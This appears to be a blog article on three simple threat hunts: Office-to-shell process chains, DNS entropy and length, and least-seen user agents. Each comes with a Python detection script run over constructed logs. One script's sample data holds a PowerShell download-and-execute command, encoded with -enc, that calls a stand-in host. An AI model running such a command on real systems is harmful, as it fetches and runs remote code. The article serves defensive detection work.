Threat hunting techniques don’t have to be sophisticated or complicated to yield useful results. A number of hunts are simple to carry out and can surface hidden threats that traditional detection tooling does not necessarily pick up.
The following three hunts are a good way for beginner threat hunters and SOC analysts to get their feet wet and start honing their skills before building out a more formal threat hunting program. No complicated technology or data collection mechanism is required, just the time and patience to do the work.
Phishing remains one of the most commonly observed attack vectors. All too often these attacks deliver Microsoft Office documents with malicious macros embedded in them, precisely to slip past detection mechanisms that fixate on filtering attached executables and other obvious red flags. The lure persuades the user to open the document and enable macros, at which point the embedded code runs and carries out its nefarious ends.
Threat hunters can start digging for malicious macro activity by looking through process creation logging and identifying anomalies in parent-child process relationships. A very good indicator of maliciousness is a Microsoft Office product (such as winword.exe, excel.exe or powerpnt.exe) spawning cmd.exe or powershell.exe. While this can sometimes be attributed to an organization’s power users, the exact command lines of those child processes should be investigated further. If an analyst finds that the process was also passed an argument like EncodedCommand, there is definitely cause for concern. Note that powershell.exe accepts any unambiguous prefix of a parameter name, so -enc, -ec and -e mean the same thing as -EncodedCommand and should be matched as well.
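The following is an added example, not code from the original article. It runs the parent-child hunt over a few constructed process creation records in the shape you might export from Sysmon Event ID 1 (parent image, image, command line); the column names, host names and sample rows are assumptions for the demonstration. It flags Office parents spawning a shell, matches every prefix form of -EncodedCommand, and decodes the payload (UTF-16LE base64) so the analyst can see what would have run.

```python
"""Hunt 1: Office applications spawning cmd.exe / powershell.exe.

Added example, not from the original article. The CSV layout mirrors a
Sysmon Event ID 1 export (assumption); rows and hosts are constructed.
"""
import base64
import csv
import io

# Constructed malicious payload; the sample row carries its base64 form.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_CSV = f"""host,parent_image,image,command_line
WS01,C:\\Windows\\explorer.exe,C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,WINWORD.EXE /n C:\\Users\\a\\invoice.docm
WS01,C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,C:\\Windows\\System32\\cmd.exe,cmd.exe /c powershell -nop -w hidden -enc {SAMPLE_B64}
WS02,C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\refresh.ps1
WS03,C:\\Windows\\explorer.exe,C:\\Windows\\System32\\cmd.exe,cmd.exe /c dir
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (case-insensitive compare)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent.

    powershell.exe accepts any unambiguous prefix of a parameter name, so
    -e, -ec, -enc and -EncodedCommand are equivalent: match the prefix,
    not the full word.  Payload is base64 of UTF-16LE text.
    """
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        name = tok[1:].lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return toks[i + 1]  # flagged but not decodable; still worth a look
    return None


def hunt_office_shells(csv_text: str):
    """Office parent + shell child -> finding; encoded command raises severity."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        parent, child = basename(row["parent_image"]), basename(row["image"])
        if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
            payload = encoded_command(row["command_line"])
            findings.append({
                "host": row["host"],
                "parent": parent,
                "child": child,
                "severity": "high" if payload is not None else "review",
                "decoded": payload,
            })
    return findings


if __name__ == "__main__":
    for f in hunt_office_shells(SAMPLE_CSV):
        print(f["severity"], f["host"], f["parent"], "->", f["child"], f["decoded"])
```

The EXCEL.EXE row on WS02 is exactly the power-user case the text mentions: it is reported for review rather than as high severity, and the analyst decides whether a signed refresh script spawned from a spreadsheet is normal in that environment.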
Looking through DNS logs provides a ready-made way to identify potential command and control and/or data exfiltration over DNS. The easiest way to start is to extract every requested domain from your infrastructure and look at its entropy.
In English certain letter combinations occur very frequently, TH and ST for example, while others such as ZT or QC are rare. Hunting on domain name “entropy” is the art of searching for strings of text that don’t look “natural.” A Shannon entropy score over the registered label is one signal, but English words of ten or more letters also score fairly high, so a simpler and often sharper starting point is to look for four or more sequential consonants, which is a pattern real words rarely produce and algorithmically generated labels produce constantly.
Another technique that pays dividends for hunters wading into DNS data is to look for abnormally long domain names, since DNS tunnelling has to pack its data into the labels of the query. The rise of content delivery networks (CDNs) and cloud services that issue long, machine-generated hostnames has muddied the waters somewhat, so expect to triage those, but the technique continues to bear fruit.
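As an added example (not code from the original article), the script below combines the three DNS signals just described, Shannon entropy of the registered label, runs of four or more consonants, and overall name length, and scores a constructed list of queried names. The thresholds (entropy above 3.5 bits, length above 50 characters) and the two-label approximation of the registered domain are assumptions to tune for your environment; a real deployment would use a public suffix list.

```python
"""Hunt 2: unnatural and overly long domain names in DNS logs.

Added example, not from the original article. Sample queries are
constructed; thresholds are assumptions.
"""
import math
import re
from collections import Counter

# 'y' is treated as a vowel so words like "rhythm" don't trip the rule.
CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxz]{4,}")

# Constructed query log: two benign names, a DGA-style label, a long
# tunnelling-style name and a long but legitimate-looking CDN hostname.
EXFIL_QUERY = "0123456789abcdef" * 4 + ".t.example.org"
CDN_QUERY = "prod-eu-west-1-static-assets-bucket-0123456789.s3.example-cdn.net"
SAMPLE_QUERIES = [
    "www.google.com",
    "mail.microsoft.com",
    "hjgtqxzpvkwrmlbn.info",
    EXFIL_QUERY,
    CDN_QUERY,
]


def shannon_entropy(s: str) -> float:
    """Bits per character; log2(len) for a string of all-distinct characters."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def registered_label(fqdn: str) -> str:
    """Label left of the TLD. Assumption: no multi-label suffixes (co.uk)."""
    labels = fqdn.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def longest_consonant_run(fqdn: str) -> int:
    """Longest run of consonants in any label; dots and hyphens break runs."""
    runs = re.findall(r"[bcdfghjklmnpqrstvwxz]+", fqdn.lower())
    return max((len(r) for r in runs), default=0)


def score_domain(fqdn: str, entropy_min: float = 3.5, long_min: int = 50) -> dict:
    fqdn = fqdn.rstrip(".").lower()
    ent = shannon_entropy(registered_label(fqdn))
    run = longest_consonant_run(fqdn)
    reasons = []
    if ent > entropy_min:
        reasons.append(f"registered label entropy {ent:.2f} bits")
    if run >= 4:
        reasons.append(f"{run} sequential consonants")
    if len(fqdn) > long_min:
        reasons.append(f"{len(fqdn)} characters long")
    return {"domain": fqdn, "entropy": ent, "consonant_run": run, "reasons": reasons}


def hunt_dns(queries):
    """Return only the flagged names, most reasons first."""
    scored = (score_domain(q) for q in set(queries))
    flagged = [s for s in scored if s["reasons"]]
    return sorted(flagged, key=lambda s: (-len(s["reasons"]), s["domain"]))


if __name__ == "__main__":
    for hit in hunt_dns(SAMPLE_QUERIES):
        print(hit["domain"], "->", "; ".join(hit["reasons"]))
```

The CDN-style hostname is flagged on length alone, which is the false positive the text warns about: stack counting by registered domain, or an allowlist of known CDN suffixes, is the usual next step before digging into the rest.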
If an organization can see HTTP metadata through a tool like Zeek (formerly known as Bro), there is a lot of revealing information available to hunters. Some of the lowest hanging fruit is in the HTTP headers, especially the user agent. A user agent string normally tells the server which browser, browser version and platform the client is running. However, the string is entirely client-controlled and trivial to manipulate, and a common trick among malware developers is to send an obviously, or sometimes not so obviously, false user agent string.
Threat hunters get good results by applying the “principle of least seen” with stack counting: tally every distinct user agent observed across the environment and sort by frequency. The statistical outliers at the bottom of the stack are the ones to start parsing through.
Common things to look for, beyond glaringly bogus strings, are the subtle changes: a dangling period at the end, small spelling errors (does Mozilla have one “L” or two?), or mysterious spaces (Silverlight is all one word, isn’t it?). Comparing each rare string against its closest frequently seen neighbour makes these differences jump out.
The outliers, whether subtle or not, should be investigated further. An outlier could be a malicious connection, or it could be a radically out-of-date system that was long ago forgotten about.
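The added example below (not code from the original article) performs the stack count over a constructed, simplified Zeek http.log and then runs the least-seen check: every user agent seen once is compared with the common ones, and a near-match is reported together with the exact characters that differ, so a missing “l” or a trailing period is shown rather than left for the eye to catch. The log layout (only ts, id.orig_h, host and user_agent columns), the traffic mix and the thresholds are assumptions for the demonstration.

```python
"""Hunt 3: least-seen user agents by stack counting.

Added example, not from the original article. The http.log is a
constructed, cut-down Zeek format (tab separated, '#' header lines);
rare/common thresholds and the similarity cut-off are assumptions.
"""
from collections import Counter
from difflib import SequenceMatcher

CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
FIREFOX = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
IE6 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

# (repetitions, user agent): constructed traffic mix for the demo.
TRAFFIC = [
    (6, CHROME),
    (3, FIREFOX),
    (1, CHROME.replace("Mozilla", "Mozila")),  # one "l" missing
    (1, CHROME + "."),                         # dangling period
    (1, IE6),                                  # forgotten XP box or a fake?
]


def build_http_log() -> str:
    """Emit a minimal Zeek-style http.log from TRAFFIC (constructed data)."""
    lines = ["#fields\tts\tid.orig_h\thost\tuser_agent"]
    ts = 1700000000.0
    for n, ua in TRAFFIC:
        for i in range(n):
            ts += 1
            lines.append(f"{ts}\t10.0.0.{i + 10}\twww.example.com\t{ua}")
    return "\n".join(lines)


def stack_count_user_agents(log_text: str) -> Counter:
    """Stack counting: one tally per distinct user agent string."""
    counts = Counter()
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        counts[line.split("\t")[3]] += 1
    return counts


def describe_diff(rare: str, common: str):
    """Non-matching segments between a rare string and its common neighbour."""
    sm = SequenceMatcher(None, rare, common)
    return [(tag, rare[i1:i2], common[j1:j2])
            for tag, i1, i2, j1, j2 in sm.get_opcodes() if tag != "equal"]


def least_seen(counts: Counter, rare_max=1, common_min=3, similarity=0.9):
    """Principle of least seen: report rare strings and how they differ
    from the nearest frequently seen string (or that nothing is close)."""
    common = [ua for ua, c in counts.items() if c >= common_min]
    report = []
    for ua, c in counts.items():
        if c > rare_max:
            continue
        nearest, ratio = None, 0.0
        for cand in common:
            r = SequenceMatcher(None, ua, cand).ratio()
            if r > ratio:
                nearest, ratio = cand, r
        lookalike = ratio >= similarity
        report.append({
            "user_agent": ua,
            "count": c,
            "verdict": "lookalike" if lookalike else "unmatched",
            "nearest": nearest,
            "diff": describe_diff(ua, nearest) if lookalike else [],
        })
    return report


if __name__ == "__main__":
    counts = stack_count_user_agents(build_http_log())
    for ua, c in counts.most_common():
        print(c, ua)
    for hit in least_seen(counts):
        print(hit["verdict"], hit["count"], hit["user_agent"], hit["diff"])
```

Lookalikes are the interesting bucket: a browser does not drop a letter from its own vendor token, so those hosts go straight to the investigation queue. The unmatched IE6 string is the other outcome the text describes, either a bogus client or a genuinely ancient machine, and either way it needs an owner.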
None of these three hunts takes fancy analytical technology or special data collection to carry out. In many cases it just takes existing logging and the time to sift and sort through CSVs and pivot tables. The easy wins they produce, though, can help make the case for more sophisticated threat hunting techniques and tools later on down the line. And of course, don’t forget what comes next. Read: After the Hunt: How to Follow Up On Cyber Threat Hunting Findings.